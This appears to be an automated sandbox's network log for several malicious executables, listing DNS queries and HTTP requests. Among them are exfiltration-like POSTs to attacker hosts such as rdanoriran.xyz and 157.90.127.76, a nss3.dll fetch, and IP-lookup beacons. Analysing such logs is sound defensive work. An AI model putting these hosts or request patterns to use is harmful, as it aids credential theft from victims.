                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861741eb8408b6-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Rid: 7f4b4d723e9646833a4a7ed62c7b3809
                                                                                                                                                                                        P3p: CP="Tumblr's privacy policy is available here: https://www.tumblr.com/policy/en/privacy"
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552001
                                                                                                                                                                                        X-Tumblr-User: sergeevih43
                                                                                                                                                                                        X-Tumblr-Pixel-0: https://px.srvcs.tumblr.com/impixu?T=1625210208&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDovL3NlcmdlZXZpaDQzLnR1bWJsci5jb20vIiwicmVxdHlwZSI6MCwicm91dGUiOiIvIn0=&U=IGEGNDONAH&K=8c1a1e5356e9e816c61be6355fa27e47192d66f8bcb07ca873516d33062ab0a5
                                                                                                                                                                                        X-Tumblr-Pixel: 1
                                                                                                                                                                                        Link: <https://assets.tumblr.com/images/default_avatar/octahedron_open_128.png>; rel=icon
                                                                                                                                                                                        Set-Cookie: pfg=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.tumblr.com; secure; HttpOnly
                                                                                                                                                                                        X-UA-Compatible: IE=Edge,chrome=1
                                                                                                                                                                                        X-UA-Device: desktop
                                                                                                                                                                                        Vary: X-UA-Device, Accept, Accept-Encoding
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/ZhiS4
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ZhiS4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        Referer: https://www.facebook.com
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=dae7bd5t7mlhle72gpmp2hadk3; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=23.129.64.153; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837980; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 1
                                                                                                                                                                                        whoami: 1040d55433af5979e0197b9a71a10277fb7dfb4d08fd0d11156f6110a96a3ae2
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        34.117.59.81
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:50 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /ip HTTP/1.1
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 13
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:16:51 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 0
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869023
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:42 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869009
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:02 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/903
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /903 HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 25
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/nss3.dll
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /nss3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 1246160
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 77783
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:41 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.240.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1TYafuTm3qyg24Dso..Bg3r1r.bo.AAA.0.0.Bg3r1r.AWVmi6duMfg; expires=Thu, 30-Sep-2021 07:16:58 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=a73eYDCu6BxFI-fD56NL4l9K; expires=Sun, 02-Jul-2023 07:16:59 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook22esateyt47yqg6mzpwcnnoi4xims3yqe5b4peowxkilsyyd.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: zV9Y88mM2DsK7GB/oxYMB3Uw7yxZp+OpopavJWqy3v9uzE5J1sD1FNZVSsza9JR/dCe1Lqe5SxtcpkYFeR036w==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:59 GMT
                                                                                                                                                                                        Priority: u=3,i
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1qp8RLbZ6dH1LYwH0..Bg3r1y.nc.AAA.0.0.Bg3r1y.AWXCbIGmnXI; expires=Thu, 30-Sep-2021 07:17:05 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=cr3eYF_EHlUZ0rHGfXGpSrny; expires=Sun, 02-Jul-2023 07:17:06 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook26qderizo52pigg5y4a2jsdhqz4odvvusaij4yhxehqngqad.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: dP4Zlc2FbAP4370Id7vr780hn7ZrIzXZ7c3QocLGK6aCuAtBB+2hi4KD0Lpt7NYKeoUy7ZQu1KGgMdiOvMC4jg==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:06 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.binance.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.binance.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.binance.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        dobbmei4jnjlh.cloudfront.net
                                                                                                                                                                                        dobbmei4jnjlh.cloudfront.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.84.150.16
                                                                                                                                                                                        dobbmei4jnjlh.cloudfront.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.84.150.20
                                                                                                                                                                                        dobbmei4jnjlh.cloudfront.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.84.150.33
                                                                                                                                                                                        dobbmei4jnjlh.cloudfront.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.84.150.4
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.binance.com/en/register?ref=WDA8929C
                                                                                                                                                                                        MicrosoftEdgeCP.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        52.84.150.16:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /en/register?ref=WDA8929C HTTP/2.0
                                                                                                                                                                                        host: www.binance.com
                                                                                                                                                                                        accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                        accept-language: en-US
                                                                                                                                                                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                                                                                                                        accept-encoding: gzip, deflate, br
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/2.0 403
                                                                                                                                                                                        server: CloudFront
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:17:06 GMT
                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                        content-length: 919
                                                                                                                                                                                        x-cache: Error from cloudfront
                                                                                                                                                                                        via: 1.1 618e94643d6094e9ff9adbaaa8ed3aef.cloudfront.net (CloudFront)
                                                                                                                                                                                        x-amz-cf-pop: AMS50-C1
                                                                                                                                                                                        x-amz-cf-id: ArlYng-8r7RLRJpFJSQtbIlx6h6DD8krLhJyfvqL_db5LNeDiHbmaQ==
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx HTTP/1.1
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 248531
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "83cafb"
                                                                                                                                                                                        last-modified: Fri, 29 Jan 2021 00:09:35 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:01:41 GMT
                                                                                                                                                                                        age: 917
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 497
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:00 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
